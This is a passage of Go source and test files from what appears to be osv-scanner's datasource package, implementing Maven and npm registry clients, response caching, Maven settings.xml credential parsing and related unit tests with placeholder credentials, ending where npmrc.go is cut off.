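func (m *MavenRegistryAPIClient) GetProject(ctx context.Context, groupID, artifactID, version string) (maven.Project, error) {
	registries := m.registrySearchOrder()

	if !strings.HasSuffix(version, "-SNAPSHOT") {
		for _, registry := range registries {
			if !registry.ReleasesEnabled {
				continue
			}
			project, err := m.getProject(ctx, registry, groupID, artifactID, version, "")
			if err == nil {
				return project, nil
			}
		}

		return maven.Project{}, fmt.Errorf("failed to fetch Maven project %s:%s@%s", groupID, artifactID, version)
	}

	for _, registry := range registries {
		// Fetch version metadata for snapshot versions from the registries enabling that.
		if !registry.SnapshotsEnabled {
			continue
		}
		metadata, err := m.getVersionMetadata(ctx, registry, groupID, artifactID, version)
		if err != nil {
			continue
		}

		// If the metadata lists no "pom" entry, snapshot stays empty and
		// getProject falls back to the plain "-SNAPSHOT" version string.
		snapshot := ""
		for _, sv := range metadata.Versioning.SnapshotVersions {
			if sv.Extension == "pom" {
				// We only look for pom.xml for project metadata.
				snapshot = string(sv.Value)
				break
			}
		}

		project, err := m.getProject(ctx, registry, groupID, artifactID, version, snapshot)
		if err == nil {
			return project, nil
		}
	}

	return maven.Project{}, fmt.Errorf("failed to fetch Maven project %s:%s@%s", groupID, artifactID, version)
}

// GetVersions returns the list of available versions of a Maven package specified by groupID and artifactID.
// Versions found in all registries are unioned, then sorted by semver.
//
// A registry whose metadata cannot be fetched or parsed is skipped, and the
// returned error is always nil, so an empty result can mean either "no
// versions" or "every registry failed". The result does not record which
// registry supplied a given version.
func (m *MavenRegistryAPIClient) GetVersions(ctx context.Context, groupID, artifactID string) ([]maven.String, error) {
	var versions []maven.String
	for _, registry := range m.registrySearchOrder() {
		metadata, err := m.getArtifactMetadata(ctx, registry, groupID, artifactID)
		if err != nil {
			continue
		}
		versions = append(versions, metadata.Versioning.Versions...)
	}
	slices.SortFunc(versions, func(a, b maven.String) int {
		return semver.Maven.Compare(string(a), string(b))
	})

	return slices.Compact(versions), nil
}

// registrySearchOrder returns the additional registries followed by the default
// registry in a freshly allocated slice. Appending the default registry to
// m.registries directly could write into that slice's spare capacity, which
// would be a data race when lookups run concurrently.
func (m *MavenRegistryAPIClient) registrySearchOrder() []MavenRegistry {
	order := make([]MavenRegistry, 0, len(m.registries)+1)
	order = append(order, m.registries...)

	return append(order, m.defaultRegistry)
}

// getProject fetches a pom.xml specified by groupID, artifactID and version and parses it to maven.Project.
// For snapshot versions, the exact version value is specified by snapshot.
// An empty snapshot means "use version as the file-name version".
func (m *MavenRegistryAPIClient) getProject(ctx context.Context, registry MavenRegistry, groupID, artifactID, version, snapshot string) (maven.Project, error) {
	if snapshot == "" {
		snapshot = version
	}
	// <registry>/<group/as/path>/<artifact>/<version>/<artifact>-<snapshot>.pom
	u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, version, fmt.Sprintf("%s-%s.pom", artifactID, snapshot)).String()

	// Credentials are chosen by registry.ID alone; nothing here checks that the
	// registry URL is the one the settings.xml entry was written for.
	// NOTE(review): if registries can come from an untrusted pom.xml, confirm
	// the caller constrains which IDs and URLs may be paired with stored credentials.
	var project maven.Project
	if err := m.get(ctx, m.registryAuths[registry.ID], u, &project); err != nil {
		return maven.Project{}, err
	}

	return project, nil
}

// getVersionMetadata fetches a version level maven-metadata.xml and parses it to maven.Metadata.
// Credentials are looked up by registry.ID, as in getProject.
func (m *MavenRegistryAPIClient) getVersionMetadata(ctx context.Context, registry MavenRegistry, groupID, artifactID, version string) (maven.Metadata, error) {
	u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, version, "maven-metadata.xml").String()

	var metadata maven.Metadata
	if err := m.get(ctx, m.registryAuths[registry.ID], u, &metadata); err != nil {
		return maven.Metadata{}, err
	}

	return metadata, nil
}

// getArtifactMetadata fetches an artifact level maven-metadata.xml and parses it to maven.Metadata.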
func (m *MavenRegistryAPIClient) getArtifactMetadata(ctx context.Context, registry MavenRegistry, groupID, artifactID string) (maven.Metadata, error) {
	// <registry>/<group/as/path>/<artifact>/maven-metadata.xml
	u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, "maven-metadata.xml").String()
	var metadata maven.Metadata
	// Credentials are selected by registry.ID only; a missing entry yields a nil auth.
	if err := m.get(ctx, m.registryAuths[registry.ID], u, &metadata); err != nil {
		return maven.Metadata{}, err
	}

	return metadata, nil
}

// get fetches apiURL through the shared response cache and XML-decodes the body
// into dst.
//
// The cache is keyed by apiURL alone, so an entry is reused no matter which auth
// was supplied. Per the inline comment, responses with status 200, 404 and 401
// are the ones cached (status code plus full body). Any other status, and any
// transport error, is returned wrapped in errAPIFailed. A body read failure is
// returned without that wrapping. A non-200 response that made it through the
// cache is reported as errAPIFailed.
//
// NOTE(review): auth is nil when registryAuths has no entry for the registry ID;
// presumably HTTPAuthentication.Get accepts a nil receiver. Verify.
// NOTE(review): the body is read with io.ReadAll and no size cap, and
// http.DefaultClient has no timeout of its own, so only ctx bounds the request.
// Registry URLs may originate from a pom.xml, so consider a bounded reader and
// a client with explicit limits.
// NOTE(review): m.responses is what GobEncode serialises, so bodies fetched with
// credentials end up in the serialised cache. Confirm where that cache is
// stored and who can read it.
func (m *MavenRegistryAPIClient) get(ctx context.Context, auth *HTTPAuthentication, apiURL string, dst any) error {
	resp, err := m.responses.Get(apiURL, func() (response, error) {
		resp, err := auth.Get(ctx, http.DefaultClient, apiURL)
		if err != nil {
			return response{}, fmt.Errorf("%w: Maven registry query failed: %w", errAPIFailed, err)
		}
		defer resp.Body.Close()

		if !slices.Contains([]int{http.StatusOK, http.StatusNotFound, http.StatusUnauthorized}, resp.StatusCode) {
			// Only cache responses with Status OK, NotFound, or Unauthorized
			return response{}, fmt.Errorf("%w: Maven registry query status: %d", errAPIFailed, resp.StatusCode)
		}

		// Whole body is buffered in memory before being stored in the cache.
		b, err := io.ReadAll(resp.Body)
		if err != nil {
			return response{}, fmt.Errorf("failed to read body: %w", err)
		}

		return response{StatusCode: resp.StatusCode, Body: b}, nil
	})
	if err != nil {
		return err
	}

	// Cached 404/401 entries reach this point and are turned into an error here.
	if resp.StatusCode != http.StatusOK {
		return fmt.Errorf("%w: Maven registry query status: %d", errAPIFailed, resp.StatusCode)
	}

	return NewMavenDecoder(bytes.NewReader(resp.Body)).Decode(dst)
}

// NewMavenDecoder returns an xml decoder with CharsetReader and Entity set.
func NewMavenDecoder(reader io.Reader) *xml.Decoder {
	decoder := xml.NewDecoder(reader)
	// Set charset reader for conversion from non-UTF-8 charset into UTF-8.
	decoder.CharsetReader = charset.NewReaderLabel
	// Set HTML entity map for translation between non-standard entity names
	// and string replacements.
decoder.Entity = xml.HTMLEntity return decoder } ================================================ FILE: internal/datasource/maven_registry_cache.go ================================================ package datasource import ( "time" ) type mavenRegistryCache struct { Timestamp *time.Time Responses map[string]response // url -> response } func (m *MavenRegistryAPIClient) GobEncode() ([]byte, error) { m.mu.Lock() defer m.mu.Unlock() if m.cacheTimestamp == nil { now := time.Now().UTC() m.cacheTimestamp = &now } cache := mavenRegistryCache{ Timestamp: m.cacheTimestamp, Responses: m.responses.GetMap(), } return gobMarshal(&cache) } func (m *MavenRegistryAPIClient) GobDecode(b []byte) error { var cache mavenRegistryCache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } m.mu.Lock() defer m.mu.Unlock() m.cacheTimestamp = cache.Timestamp m.responses.SetMap(cache.Responses) return nil } ================================================ FILE: internal/datasource/maven_registry_test.go ================================================ package datasource import ( "net/url" "reflect" "testing" "deps.dev/util/maven" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMavenRegistryAPIClient_GetProject(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/1.0.0/x.y.z-1.0.0.pom", []byte(` org.example x.y.z 1.0.0 `)) got, err := client.GetProject(t.Context(), "org.example", "x.y.z", "1.0.0") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "1.0.0", err) } want := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "1.0.0", }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", 
"org.example", "x.y.z", "1.0.0", got, want) } } func TestGetProjectSnapshot(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, SnapshotsEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/maven-metadata.xml", []byte(` org.example x.y.z 20230302.052731 9 20230302052731 jar 3.3.1-20230302.052731-9 20230302052731 pom 3.3.1-20230302.052731-9 20230302052731 `)) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/x.y.z-3.3.1-20230302.052731-9.pom", []byte(` org.example x.y.z 3.3.1-SNAPSHOT `)) got, err := client.GetProject(t.Context(), "org.example", "x.y.z", "3.3.1-SNAPSHOT") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "3.3.1-SNAPSHOT", err) } want := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "3.3.1-SNAPSHOT", }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", "3.3.1-SNAPSHOT", got, want) } } func TestGetArtifactMetadata(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 3.0 3.0 1.0 2.0 3.0 `)) u, err := url.Parse(srv.URL) if err != nil { t.Fatalf("failed to get parse URL %s: %v", srv.URL, err) } got, err := client.getArtifactMetadata(t.Context(), MavenRegistry{Parsed: u}, "org.example", "x.y.z") if err != nil { t.Fatalf("failed to get artifact metadata for %s:%s: %v", "org.example", "x.y.z", err) } want := maven.Metadata{ GroupID: "org.example", ArtifactID: "x.y.z", Versioning: maven.Versioning{ Latest: "3.0", Release: "3.0", Versions: []maven.String{ "1.0", "2.0", "3.0", }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetArtifactMetadata(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", 
got, want) } } func TestGetVersionMetadata(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, SnapshotsEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/maven-metadata.xml", []byte(` org.example x.y.z 20230302.052731 9 20230302052731 jar 3.3.1-20230302.052731-9 20230302052731 pom 3.3.1-20230302.052731-9 20230302052731 `)) u, err := url.Parse(srv.URL) if err != nil { t.Fatalf("failed to get parse URL %s: %v", srv.URL, err) } got, err := client.getVersionMetadata(t.Context(), MavenRegistry{Parsed: u}, "org.example", "x.y.z", "3.3.1-SNAPSHOT") if err != nil { t.Fatalf("failed to get metadata for %s:%s verion %s: %v", "org.example", "x.y.z", "3.3.1-SNAPSHOT", err) } want := maven.Metadata{ GroupID: "org.example", ArtifactID: "x.y.z", Versioning: maven.Versioning{ Snapshot: maven.Snapshot{ Timestamp: "20230302.052731", BuildNumber: 9, }, LastUpdated: "20230302052731", SnapshotVersions: []maven.SnapshotVersion{ { Extension: "jar", Value: "3.3.1-20230302.052731-9", Updated: "20230302052731", }, { Extension: "pom", Value: "3.3.1-20230302.052731-9", Updated: "20230302052731", }, }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("getVersionMetadata(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", got, want) } } func TestMultipleRegistry(t *testing.T) { t.Parallel() dft := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: dft.URL, ReleasesEnabled: true}) dft.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 3.0.0 3.0.0 2.0.0 3.0.0 `)) dft.SetResponse(t, "org/example/x.y.z/2.0.0/x.y.z-2.0.0.pom", []byte(` org.example x.y.z 2.0.0 `)) dft.SetResponse(t, "org/example/x.y.z/3.0.0/x.y.z-3.0.0.pom", []byte(` org.example x.y.z 3.0.0 `)) srv := testutility.NewMockHTTPServer(t) if err := client.AddRegistry(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}); err != nil { t.Fatalf("failed to add registry 
%s: %v", srv.URL, err) } srv.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 2.0.0 2.0.0 1.0.0 2.0.0 `)) srv.SetResponse(t, "org/example/x.y.z/1.0.0/x.y.z-1.0.0.pom", []byte(` org.example x.y.z 1.0.0 `)) srv.SetResponse(t, "org/example/x.y.z/2.0.0/x.y.z-2.0.0.pom", []byte(` org.example x.y.z 2.0.0 `)) gotProj, err := client.GetProject(t.Context(), "org.example", "x.y.z", "1.0.0") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "1.0.0", err) } wantProj := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "1.0.0", }, } if !reflect.DeepEqual(gotProj, wantProj) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", "1.0.0", gotProj, wantProj) } gotVersions, err := client.GetVersions(t.Context(), "org.example", "x.y.z") if err != nil { t.Fatalf("failed to get versions for Maven package %s:%s: %v", "org.example", "x.y.z", err) } wantVersions := []maven.String{"1.0.0", "2.0.0", "3.0.0"} if !reflect.DeepEqual(gotVersions, wantVersions) { t.Errorf("GetVersions(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", gotVersions, wantVersions) } } ================================================ FILE: internal/datasource/maven_settings.go ================================================ package datasource import ( "encoding/xml" "os" "os/exec" "path/filepath" "runtime" "strings" "unicode" "github.com/google/osv-scanner/v2/internal/cachedregexp" ) // Maven settings.xml file parsing for registry authentication. 
// https://maven.apache.org/settings.html

// MavenSettingsXML holds the part of a Maven settings.xml that is read here:
// the entries under <servers>.
type MavenSettingsXML struct {
	Servers []MavenSettingsXMLServer `xml:"servers>server"`
}

// MavenSettingsXMLServer is one <server> entry. Username and Password are kept
// as plain strings, exactly as written in the file apart from ${env.*}
// expansion, so values of this type should stay out of logs and error messages.
type MavenSettingsXMLServer struct {
	ID       string `xml:"id"`
	Username string `xml:"username"`
	Password string `xml:"password"`
}

// ParseMavenSettings reads the settings.xml at path and returns its server
// entries with ${env.NAME} references in the ID, username and password replaced
// by the value of the environment variable NAME.
//
// The function is best-effort: if the file cannot be opened or decoded it
// returns an empty MavenSettingsXML and no error, so callers cannot tell a
// missing file from an unreadable or malformed one. References to variables
// that are not set are left in place unchanged.
//
// NOTE(review): a plain xml.NewDecoder is used here, without the CharsetReader
// that NewMavenDecoder installs, so a settings.xml declaring a non-UTF-8
// encoding fails to decode and yields empty settings. Confirm that is intended.
func ParseMavenSettings(path string) MavenSettingsXML {
	file, err := os.Open(path)
	if err != nil {
		return MavenSettingsXML{}
	}
	defer file.Close()

	var parsed MavenSettingsXML
	if decodeErr := xml.NewDecoder(file).Decode(&parsed); decodeErr != nil {
		return MavenSettingsXML{}
	}

	// Only ${env.*} references are interpolated; system properties are too
	// hard to determine.
	envRef := cachedregexp.MustCompile(`\${env\.[^}]*}`)
	expand := func(ref string) string {
		// Strip the "${env." prefix and the closing "}" to get the variable name.
		name := strings.TrimSuffix(strings.TrimPrefix(ref, "${env."), "}")

		// Environment variables on Windows are case-insensitive,
		// but Maven will only replace them if they are in all-caps.
		if runtime.GOOS == "windows" && strings.ContainsFunc(name, unicode.IsLower) {
			return ref
		}

		value, found := os.LookupEnv(name)
		if !found {
			// Leave the reference untouched when the variable is not set.
			return ref
		}

		return value
	}

	for i := range parsed.Servers {
		server := &parsed.Servers[i]
		server.ID = envRef.ReplaceAllStringFunc(server.ID, expand)
		server.Username = envRef.ReplaceAllStringFunc(server.Username, expand)
		server.Password = envRef.ReplaceAllStringFunc(server.Password, expand)
	}

	return parsed
}

// TODO: How to use with virtual filesystem + environment variables.
func globalMavenSettingsFile() string { // ${maven.home}/conf/settings.xml // Find ${maven.home} from the installed mvn binary mvnExec, err := exec.LookPath("mvn") if err != nil { return "" } mvnExec, err = filepath.EvalSymlinks(mvnExec) if err != nil { return "" } settings := filepath.Join(filepath.Dir(mvnExec), "..", "conf", "settings.xml") settings, err = filepath.Abs(settings) if err != nil { return "" } return settings } func userMavenSettingsFile() string { // ${user.home}/.m2/settings.xml home, err := os.UserHomeDir() if err != nil { return "" } return filepath.Join(home, ".m2", "settings.xml") } var mavenSupportedAuths = []HTTPAuthMethod{AuthDigest, AuthBasic} func MakeMavenAuth(globalSettings, userSettings MavenSettingsXML) map[string]*HTTPAuthentication { auth := make(map[string]*HTTPAuthentication) for _, s := range globalSettings.Servers { auth[s.ID] = &HTTPAuthentication{ SupportedMethods: mavenSupportedAuths, AlwaysAuth: false, Username: s.Username, Password: s.Password, } } for _, s := range userSettings.Servers { auth[s.ID] = &HTTPAuthentication{ SupportedMethods: mavenSupportedAuths, AlwaysAuth: false, Username: s.Username, Password: s.Password, } } return auth } ================================================ FILE: internal/datasource/maven_settings_test.go ================================================ package datasource_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scanner/v2/internal/datasource" ) func TestParseMavenSettings(t *testing.T) { t.Setenv("MAVEN_SETTINGS_TEST_USR", "UsErNaMe") t.Setenv("MAVEN_SETTINGS_TEST_PWD", "P455W0RD") t.Setenv("MAVEN_SETTINGS_TEST_SID", "my-cool-server") t.Setenv("MAVEN_SETTINGS_TEST_NIL", "") want := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "server1", Username: "user", Password: "pass", }, { ID: "server2", Username: "UsErNaMe", Password: "~~P455W0RD~~", }, { ID: "my-cool-server", Username: 
"${env.maven_settings_test_usr}-", Password: "${env.MAVEN_SETTINGS_TEST_BAD}", }, }, } got := datasource.ParseMavenSettings("./testdata/maven_settings/settings.xml") if diff := cmp.Diff(want, got); diff != "" { t.Errorf("ParseMavenSettings() (-want +got):\n%s", diff) } } func TestMakeMavenAuth(t *testing.T) { t.Parallel() globalSettings := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "global", Username: "global-user", Password: "global-pass", }, { ID: "overwrite1", Username: "original-user", Password: "original-pass", }, { ID: "overwrite2", Username: "user-to-be-deleted", // no password }, }, } userSettings := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "user", Username: "user", Password: "pass", }, { ID: "overwrite1", Username: "new-user", Password: "new-pass", }, { ID: "overwrite2", // no username Password: "lone-password", }, }, } wantSupportedMethods := []datasource.HTTPAuthMethod{datasource.AuthDigest, datasource.AuthBasic} want := map[string]*datasource.HTTPAuthentication{ "global": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "global-user", Password: "global-pass", }, "user": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "user", Password: "pass", }, "overwrite1": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "new-user", Password: "new-pass", }, "overwrite2": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "", Password: "lone-password", }, } got := datasource.MakeMavenAuth(globalSettings, userSettings) if diff := cmp.Diff(want, got, cmpopts.IgnoreUnexported(datasource.HTTPAuthentication{})); diff != "" { t.Errorf("MakeMavenAuth() (-want +got):\n%s", diff) } } ================================================ FILE: internal/datasource/npm_registry.go ================================================ package datasource import ( "context" "errors" "fmt" "io" "maps" "net/http" "slices" "sync" 
"time" "github.com/tidwall/gjson" ) type NpmRegistryAPIClient struct { // Registries from the npmrc config // This should only be written to when the client is first being created. // Other functions should not modify it & it is not covered by the mutex. registries NpmRegistryConfig // cache fields mu sync.Mutex cacheTimestamp *time.Time // If set, this means we loaded from a cache details *RequestCache[string, npmRegistryPackageDetails] } type npmRegistryPackageDetails struct { // Only cache the info needed for the DependencyClient Versions map[string]NpmRegistryDependencies Tags map[string]string } func NewNpmRegistryAPIClient(workdir string) (*NpmRegistryAPIClient, error) { registries, err := LoadNpmRegistryConfig(workdir) if err != nil { return nil, err } return &NpmRegistryAPIClient{ registries: registries, details: NewRequestCache[string, npmRegistryPackageDetails](), }, nil } type NpmRegistryVersions struct { Versions []string Tags map[string]string } func (c *NpmRegistryAPIClient) Versions(ctx context.Context, pkg string) (NpmRegistryVersions, error) { pkgDetails, err := c.getPackageDetails(ctx, pkg) if err != nil { return NpmRegistryVersions{}, err } return NpmRegistryVersions{ Versions: slices.AppendSeq(make([]string, 0, len(pkgDetails.Versions)), maps.Keys(pkgDetails.Versions)), Tags: pkgDetails.Tags, }, nil } type NpmRegistryDependencies struct { // TODO: These maps should preserve ordering from JSON response Dependencies map[string]string DevDependencies map[string]string PeerDependencies map[string]string OptionalDependencies map[string]string BundleDependencies []string } func (c *NpmRegistryAPIClient) Dependencies(ctx context.Context, pkg, version string) (NpmRegistryDependencies, error) { pkgDetails, err := c.getPackageDetails(ctx, pkg) if err != nil { return NpmRegistryDependencies{}, err } if deps, ok := pkgDetails.Versions[version]; ok { return deps, nil } return NpmRegistryDependencies{}, fmt.Errorf("no version %s for package %s", version, pkg) 
} func (c *NpmRegistryAPIClient) FullJSON(ctx context.Context, pkg, version string) (gjson.Result, error) { return c.get(ctx, pkg, version) } func (c *NpmRegistryAPIClient) get(ctx context.Context, urlComponents ...string) (gjson.Result, error) { resp, err := c.registries.MakeRequest(ctx, http.DefaultClient, urlComponents...) if err != nil { return gjson.Result{}, err } defer resp.Body.Close() if resp.StatusCode != http.StatusOK { return gjson.Result{}, errors.New(resp.Status) } body, err := io.ReadAll(resp.Body) if err != nil { return gjson.Result{}, err } res := gjson.ParseBytes(body) return res, nil } func (c *NpmRegistryAPIClient) getPackageDetails(ctx context.Context, pkg string) (npmRegistryPackageDetails, error) { return c.details.Get(pkg, func() (npmRegistryPackageDetails, error) { jsonData, err := c.get(ctx, pkg) if err != nil { return npmRegistryPackageDetails{}, err } versions := make(map[string]NpmRegistryDependencies) for v, data := range jsonData.Get("versions").Map() { versions[v] = NpmRegistryDependencies{ Dependencies: jsonToStringMap(data.Get("dependencies")), DevDependencies: jsonToStringMap(data.Get("devDependencies")), PeerDependencies: jsonToStringMap(data.Get("peerDependencies")), OptionalDependencies: jsonToStringMap(data.Get("optionalDependencies")), BundleDependencies: jsonToStringSlice(data.Get("bundleDependencies")), } } return npmRegistryPackageDetails{ Versions: versions, Tags: jsonToStringMap(jsonData.Get("dist-tags")), }, nil }) } func jsonToStringSlice(v gjson.Result) []string { arr := v.Array() if len(arr) == 0 { return nil } strs := make([]string, len(arr)) for i, s := range arr { strs[i] = s.String() } return strs } func jsonToStringMap(v gjson.Result) map[string]string { mp := v.Map() if len(mp) == 0 { return nil } strs := make(map[string]string) for k, s := range mp { strs[k] = s.String() } return strs } ================================================ FILE: internal/datasource/npm_registry_cache.go 
================================================ package datasource import ( "maps" "strings" "time" ) type npmRegistryCache struct { Timestamp *time.Time // Timestamp of when this cache was made Details map[string]npmRegistryPackageDetails // For a package name, the versions & their dependencies, and the list of tags ScopeURLs map[string]string // The URL of the registry used for a given package @scope. Used to invalidate cache if registry has changed. } func (c *NpmRegistryAPIClient) GobEncode() ([]byte, error) { c.mu.Lock() defer c.mu.Unlock() if c.cacheTimestamp == nil { now := time.Now().UTC() c.cacheTimestamp = &now } cache := npmRegistryCache{ Timestamp: c.cacheTimestamp, Details: c.details.GetMap(), ScopeURLs: make(map[string]string), } // store the registry URL for each scope (but not the auth info) cache.ScopeURLs = c.registries.ScopeURLs return gobMarshal(&cache) } func (c *NpmRegistryAPIClient) GobDecode(b []byte) error { // decode the cached data var cache npmRegistryCache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } c.mu.Lock() defer c.mu.Unlock() // remove any cache entries whose registry has changed maps.DeleteFunc(cache.Details, func(pkg string, _ npmRegistryPackageDetails) bool { scope := "" if strings.HasPrefix(pkg, "@") { scope, _, _ = strings.Cut(pkg, "/") } return cache.ScopeURLs[scope] != c.registries.ScopeURLs[scope] }) c.cacheTimestamp = cache.Timestamp c.details.SetMap(cache.Details) return nil } ================================================ FILE: internal/datasource/npm_registry_test.go ================================================ package datasource_test import ( compare "cmp" "path/filepath" "strings" "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/testutility" 
"github.com/tidwall/gjson" ) func TestNpmRegistryClient(t *testing.T) { t.Parallel() //nolint:gosec // "Potential hardcoded credentials" :) const ( auth = "Y29vbDphdXRoCg==" authToken = "bmljZS10b2tlbgo=" ) srv1 := testutility.NewMockHTTPServer(t) srv1.SetAuthorization(t, "Basic "+auth) srv1.SetResponseFromFile(t, "/fake-package", "./testdata/npm_registry/fake-package.json") srv1.SetResponseFromFile(t, "/fake-package/2.2.2", "./testdata/npm_registry/fake-package-2.2.2.json") srv2 := testutility.NewMockHTTPServer(t) srv2.SetAuthorization(t, "Bearer "+authToken) srv2.SetResponseFromFile(t, "/@fake-registry%2fa", "./testdata/npm_registry/@fake-registry-a.json") npmrcFile := createTempNpmrc(t, ".npmrc") writeToNpmrc(t, npmrcFile, "registry="+srv1.URL, "//"+strings.TrimPrefix(srv1.URL, "http://")+"/:_auth="+auth, "@fake-registry:registry="+srv2.URL, "//"+strings.TrimPrefix(srv2.URL, "http://")+"/:_authToken="+authToken, ) cl, err := datasource.NewNpmRegistryAPIClient(filepath.Dir(npmrcFile)) if err != nil { t.Fatalf("failed creating npm api client: %v", err) } { const pkg = "fake-package" want := datasource.NpmRegistryVersions{ Versions: []string{"1.0.0", "2.2.2"}, Tags: map[string]string{ "latest": "1.0.0", "version1": "1.0.0", "version2": "2.2.2", }, } got, err := cl.Versions(t.Context(), pkg) if err != nil { t.Fatalf("failed getting versions: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Versions(\"%s\") (-want +got)\n%s", pkg, diff) } } { const pkg = "@fake-registry/a" want := datasource.NpmRegistryVersions{ Versions: []string{"1.2.3", "2.3.4"}, Tags: map[string]string{"latest": "2.3.4"}, } got, err := cl.Versions(t.Context(), pkg) if err != nil { t.Fatalf("failed getting versions: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Versions(\"%s\") (-want +got)\n%s", pkg, diff) } } { const pkg = "fake-package" const ver = "2.2.2" want := 
datasource.NpmRegistryDependencies{ Dependencies: map[string]string{ "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1", }, DevDependencies: map[string]string{ "c": "^1.1.1", "d": "^1.0.2", }, PeerDependencies: map[string]string{ "h": "^1.0.0", }, OptionalDependencies: map[string]string{ "e": "^0.2.33", "f": "npm:g@^2.0.1", }, BundleDependencies: []string{ "a", }, } got, err := cl.Dependencies(t.Context(), pkg, ver) if err != nil { t.Fatalf("failed getting dependencies: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Dependencies(\"%s\", \"%s\") (-want +got)\n%s", pkg, ver, diff) } } { const pkg = "fake-package" const ver = "2.2.2" want := gjson.Parse(`{ "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] }`) got, err := cl.FullJSON(t.Context(), pkg, ver) if err != nil { t.Fatalf("failed getting full json: %v", err) } wantMap := want.Value().(map[string]any) gotMap := got.Value().(map[string]any) if diff := cmp.Diff(wantMap, gotMap, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("FullJSON(\"%s\", \"%s\") (-want +got)\n%s", pkg, ver, diff) } } } ================================================ FILE: internal/datasource/npmrc.go 
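================================================
package datasource

import (
	"bytes"
	"context"
	"encoding/base64"
	"errors"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"path/filepath"
	"strings"

	"github.com/google/osv-scanner/v2/internal/cachedregexp"
	"gopkg.in/ini.v1"
)

// NpmrcConfig is the merged npmrc configuration as a flat key -> value map.
type NpmrcConfig map[string]string

// loadNpmrc merges the npmrc sources that apply to workdir and returns the
// keys of the resulting default section.
//
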